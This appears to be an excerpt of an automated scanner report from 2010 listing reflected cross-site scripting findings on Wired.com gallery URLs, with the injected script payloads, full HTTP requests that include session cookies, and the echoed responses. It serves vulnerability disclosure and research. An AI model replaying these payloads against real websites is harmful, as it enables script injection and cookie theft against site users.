The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> request parameter is copied into the HTML document as plain text between tags. The payload 21969<script>alert(1)</script>01760d30d83 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the name of an HTML tag. The payload 6981a><script>alert(1)</script>03dc29fdb27 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the HTML document as plain text between tags. The payload d1198<script>alert(1)</script>39b53ac696 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload ea80a<script>alert(1)</script>2ef91889cf7 was submitted in the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbadd"><script>alert(1)</script>08561a98595 was submitted in the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595 HTTP/1.1 Host: www.wired.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:34:07 GMT Date: Sun, 21 Nov 2010 20:24:07 GMT Connection: close Content-Length: 40729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eac"><script>alert(1)</script>7170e64b2e2 was submitted in the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2 HTTP/1.1 Host: www.wired.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; __utmb=238032518; __utmc=238032518; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_nr=1290369692237; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:35:32 GMT Date: Sun, 21 Nov 2010 20:25:32 GMT Connection: close Content-Length: 40743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... cript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
1.500. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a1"><script>alert(1)</script>4b74896c38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:08:35 GMT Date: Sun, 21 Nov 2010 19:58:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of the slideView request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbdd"><script>alert(1)</script>6a2fa36c36 was submitted in the slideView parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb54d"><a>c56f61c551c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturebb54d"><a>c56f61c551c/art/multimedia/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturebb54d"><a>c56f61c551c ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c4c"><a>89e1688aab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artc7c4c"><a>89e1688aab6/multimedia/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:17 GMT Date: Sun, 21 Nov 2010 23:07:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artc7c4c"><a>89e1688aab6 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71fa"><a>b579a399708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimediad71fa"><a>b579a399708/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:33 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimediad71fa"><a>b579a399708"> ...[SNIP]...
1.505. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8377"><script>alert(1)</script>a852d762798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc57e"><a>6479810cedb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturefc57e"><a>6479810cedb/art/multimedia/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturefc57e"><a>6479810cedb ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287df"><a>b9badeee24d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art287df"><a>b9badeee24d/multimedia/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art287df"><a>b9badeee24d c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5771a"><a>9832fc9791e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia5771a"><a>9832fc9791e/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia5771a"><a>9832fc9791e"> ...[SNIP]...
1.509. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wired.com
Path:
/culture/art/multimedia/2008/10/gallery_trains
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54b5"><script>alert(1)</script>ea506289b5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1308"><a>62b113b6ddc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec1308"><a>62b113b6ddc/art/news/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:15 GMT Date: Sun, 21 Nov 2010 23:07:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec1308"><a>62b113b6ddc ss_art c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b07"><a>51bc0c4125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art33b07"><a>51bc0c4125e/news/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:37 GMT Date: Sun, 21 Nov 2010 23:07:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art33b07"><a>51bc0c4125e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ea3"><a>733ee83aeca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/newsb8ea3"><a>733ee83aeca/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:49 GMT Date: Sun, 21 Nov 2010 23:07:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_newsb8ea3"><a>733ee83aeca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b187a"><a>710ea181819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
